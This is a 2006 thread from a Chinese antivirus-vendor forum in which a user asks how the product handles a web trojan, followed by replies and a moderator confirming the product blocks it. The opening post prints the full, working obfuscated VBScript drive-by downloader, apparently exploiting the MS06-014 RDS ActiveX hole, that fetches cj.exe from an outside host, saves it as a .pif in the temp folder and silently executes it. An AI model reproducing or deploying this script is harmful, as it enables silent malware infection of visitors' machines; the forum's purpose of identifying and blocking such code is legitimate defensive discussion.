微点交流论坛
» 游客:  注册 | 登录 | 帮助

 

作者:
标题: 未知道这种情况微点怎么处理
sunya
注册用户

新手上路



积分 68
发帖 68
注册 2005-12-15
#1  未知道这种情况微点怎么处理

CODE:  [Copy to clipboard]
<html>
<body>
<script type="text/jscript">
function init() {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
aurl_0="http://www.ip321.cn/cj.e"
aurl_0=aurl_0+"xe"
mbb41m="A"
kbb22q="d"
sbb43e="odb.Stream"
nss31q=""
iss62u="M"
lss43n="icrosoft.XMLHTTP"
tcc81w="clsid:BD"
tcc12u="9"
fcc63s="6C556-65A3-11D0-983A-00C04FC29E36"
ooo61n="Scri"
soo02o="p"
soo43f="ting.FileSystemObject"
ejj81c="obj"
kjj82h="e"
tjj23d="ct"
ocl11t="class"
qcl22c="i"
ycl73n="d"
f5sbs3=nss31q&iss62u&lss43n
i4b4br=mbb41m&kbb22q&sbb43e
h0cqc2=tcc81w&tcc12u&fcc63s
e7o6or=ooo61n&soo02o&soo43f
r1jgj2=ejj81c&kjj82h&tjj23d
b4l4ln=ocl11t&qcl22c&ycl73n
Set p1d1fs = document.createElement(r1jgj2)
p1d1fs.setAttribute b4l4ln, h0cqc2
set i3f4n = p1d1fs.createobject(e7o6or,"")
set p2x2l = p1d1fs.CreateObject(f5sbs3,"")
set q4sl7 = p1d1fs.CreateObject(i4b4br,"")
set ste3mp = i3f4n.GetSpecialFolder(2)
q4sl7.type = 1
d2get="GET"
p2x2l.Open d2get, aurl_0, False
p2x2l.Send
t5L_hy50= "L_hy50.pif"
t5L_hy50= i3f4n.BuildPath(ste3mp,t5L_hy50)
q4sl7.open
q4sl7.write p2x2l.responseBody
q4sl7.savetofile t5L_hy50,2
q4sl7.close
</script>
<script language="VBScript">
on error resume next
mbb41m="A"
kbb22q="d"
sbb43e="odb.Stream"
nss31q=""
iss62u="M"
lss43n="icrosoft.XMLHTTP"
tcc81w="clsid:BD"
tcc12u="9"
fcc63s="6C556-65A3-11D0-983A-00C04FC29E36"
ooo61n="Scri"
soo02o="p"
soo43f="ting.FileSystemObject"
ejj81c="obj"
kjj82h="e"
tjj23d="ct"
ocl11t="class"
qcl22c="i"
ycl73n="d"
yse51w="Shell."
lse42x="A"
mse43s="pplication"
f5sbs3=nss31q&iss62u&lss43n  '組合成Microsoft.XMLHTTP
i4b4br=mbb41m&kbb22q&sbb43e  '組合成Adodb.Stream
h0cqc2=tcc81w&tcc12u&fcc63s  '組合成clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
e7o6or=ooo61n&soo02o&soo43f  '組合成Scripting.FileSystemObject
r1jgj2=ejj81c&kjj82h&tjj23d  '組合成object
b4l4ln=ocl11t&qcl22c&ycl73n  '組合成classid
l0ehe0=yse51w&lse42x&mse43s  '組合成Shell.Application
Set p1d1fs = document.createElement(r1jgj2)  '相當於HTML標簽<object>
p1d1fs.setAttribute b4l4ln, h0cqc2    '給object加上屬性。。。。。。接下來就不用多說了。。。
set i3f4n = p1d1fs.createobject(e7o6or,"")
set x1qa8 = p1d1fs.CreateObject(l0ehe0,"")
set ste3mp = i3f4n.GetSpecialFolder(2)
t5L_hy50= "L_hy50.pif"
t5L_hy50= i3f4n.BuildPath(ste3mp,t5L_hy50)
x1qa8.ShellExecute t5L_hy50,"","","open",0
</script>
</body>
</html>
</script>
[ Last edited by sunya on 2006-12-1 at 10:02 ]

※ ※ ※ 本文纯属【sunya】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

支持微点,啥时候出正式版,哥几个给个Email,咱立马就汇钱过去
2006-12-1 09:37
查看资料  发短消息   编辑帖子
sunya
注册用户

新手上路



积分 68
发帖 68
注册 2005-12-15
#2  

都看看

※ ※ ※ 本文纯属【sunya】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

支持微点,啥时候出正式版,哥几个给个Email,咱立马就汇钱过去
2006-12-1 10:03
查看资料  发短消息   编辑帖子
v6hacker
新手上路





积分 2
发帖 2
注册 2006-12-2
#3  

好明显。这是个网马源代码了,,是不是MS06014的????一个字。杀!!!!

※ ※ ※ 本文纯属【v6hacker】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-2 00:55
查看资料  发送邮件  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#4  

经官方测试该脚本自动到网络地址http://www.ip321***.cn/cj.exe下载cj.exe文件然后执行并会删除自身,微点可以拦截并处理成功。

附件 1: 11.jpg (2006-12-2 13:43, 402.01 K,下载次数: 24)


※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2006-12-2 13:43
查看资料  发短消息   编辑帖子
weizg
中级用户




积分 434
发帖 430
注册 2006-11-25
来自 广西南宁
#5  

呵呵,强吧

※ ※ ※ 本文纯属【weizg】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-3 10:37
查看资料  发送邮件  发短消息  QQ   编辑帖子
fujianwzh
中级用户




积分 252
发帖 216
注册 2006-8-17
#6  

我的微点对付了类似的N个网马了。。。一概杀无赦

※ ※ ※ 本文纯属【fujianwzh】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

Google的后花园 →Googlegarden.blogspot.com
软件搜搜 soso  →Softsoso.blogspot.com
2006-12-3 10:54
查看资料  发短消息   编辑帖子
li0171241
新手上路





积分 17
发帖 17
注册 2006-8-13
#7  

表现还不错的,支持微点

※ ※ ※ 本文纯属【li0171241】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-3 11:45
查看资料  发短消息   编辑帖子
zjf
中级用户




积分 229
发帖 229
注册 2006-10-5
#8  

不错哦!!

※ ※ ※ 本文纯属【zjf】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-5 21:52
查看资料  发短消息   编辑帖子
huolongwuai
新手上路





积分 9
发帖 9
注册 2006-12-10
来自 武汉
#9  看得笑,顶微点

看得笑,顶微点

※ ※ ※ 本文纯属【huolongwuai】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-12 19:08
查看资料  发送邮件  发短消息  QQ   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]


北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号